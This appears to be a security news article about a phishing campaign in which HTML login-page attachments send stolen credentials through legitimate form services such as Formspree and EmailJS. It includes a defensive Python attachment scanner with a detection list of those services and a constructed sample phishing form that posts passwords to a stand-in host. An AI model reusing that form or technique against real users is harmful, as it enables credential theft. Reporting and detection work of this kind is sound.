CyberSecurity SEE

Sign in to access leaked credentials

An ongoing phishing campaign has been discovered in which attackers use legitimate form-handling services for credential harvesting and data exfiltration in order to avoid detection. According to recent data, credential harvesting remains the most common attack vector, accounting for 59% of all recorded attacks. This method also contributes significantly to business email compromise (BEC), which makes up 15% of all attacks.

HTML files are one of the most popular attack vectors used by cybercriminals, making up more than 50% of malicious attachments, according to Check Point’s telemetry. These files often masquerade as login pages for well-known services and companies like Microsoft and Webmail in order to deceive unsuspecting users.

Phishing campaigns involving tens of thousands of emails have been observed to utilize reputable services such as EmailJS, Formbold, Formspree, and Formspark to collect stolen credentials. These online form builders are commonly used by developers to create unique forms for their websites or web applications. These forms can include various types of form field elements, such as text input fields, radio buttons, checkboxes, and dropdown menus, to systematically gather user data. Once a user submits the form, the service processes the data and collects the compromised credentials.

Credential harvesting enables criminals to acquire sensitive information like usernames and passwords, which they can use to gain initial access to companies or sell on the dark web. This method has become increasingly challenging to combat, as attackers leverage legitimate services, making it harder to block malicious HTML files. By using the API of these services, attackers can send stolen credentials to any location of their choosing, including their own mailbox.

Researchers explain that one of the ongoing campaigns they discovered starts with a phishing email that pressures the recipient to open an attachment. This campaign uses multiple versions of the email and various HTML templates. In these templates, the victim’s email address is pre-filled in the form, giving the sign-in page a more trustworthy appearance. As soon as the victim enters their login and password and tries to log in, the attacker receives their credentials directly in their email inbox.

To effectively defend against phishing attempts, organizations are advised to implement security awareness training, email filtering, scanning for malicious attachments, and checking for spelling and grammar errors. Additionally, utilizing anti-phishing solutions can further enhance an organization’s cybersecurity posture.
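One way to scan HTML attachments for the traits described above (a password field, a pre-filled e-mail address, and a submission URL that points at a form-builder service), shown as an added example that is not code from the researchers or from any vendor. Matching on the service name inside the URL host is an assumption of this example, and the sample attachments and `.example` hosts are constructed.

```python
import re
from html.parser import HTMLParser

# Service names come from the article; matching them inside a URL host is an
# assumption of this example, not a vendor-published indicator list.
FORM_SERVICES = ("emailjs", "formbold", "formspree", "formspark")
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

# Constructed sample attachments (not taken from the campaign).
SAMPLE = ('<form action="https://formspree.example/f/constructed" method="post">'
          '<input type="email" name="user" value="victim@corp.example">'
          '<input type="password" name="pass"><button>Sign in</button></form>')
BENIGN = ('<form action="https://intranet.example/login">'
          '<input type="password" name="p"></form>')


class AttachmentScan(HTMLParser):
    """Collects the traits the article attributes to the phishing attachments."""

    def __init__(self):
        super().__init__()
        self.password_fields = 0
        self.prefilled_email = False
        self.service_hosts = set()

    def _note_urls(self, text):
        for host in URL_RE.findall(text or ""):
            if any(name in host.lower() for name in FORM_SERVICES):
                self.service_hosts.add(host.lower())

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input":
            if (a.get("type") or "").lower() == "password":
                self.password_fields += 1
            elif EMAIL_RE.match(a.get("value") or ""):
                self.prefilled_email = True   # victim address baked into the form
        for value in a.values():              # form action, script src, href
            self._note_urls(value)

    def handle_data(self, data):              # inline script bodies with API URLs
        self._note_urls(data)


def scan_html_attachment(html):
    scan = AttachmentScan()
    scan.feed(html)
    scan.close()
    suspicious = scan.password_fields > 0 and bool(scan.service_hosts)
    return {"suspicious": suspicious, "prefilled_email": scan.prefilled_email,
            "service_hosts": sorted(scan.service_hosts)}
```

The check reads only plain markup, so an attachment that builds its form or URL at runtime from encoded script content will not match and needs sandbox rendering or decoding first.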

In conclusion, attackers are employing legitimate credential harvesting services and data exfiltration techniques to evade detection in an ongoing phishing campaign. Credential harvesting remains the most common attack vector, contributing significantly to BEC attacks. HTML files are frequently used as the attack vector, often posing as login pages for reputable services and companies. By leveraging reputable online form builders, attackers collect stolen credentials systematically. To combat these threats, organizations should implement various security measures, including awareness training and anti-phishing solutions.
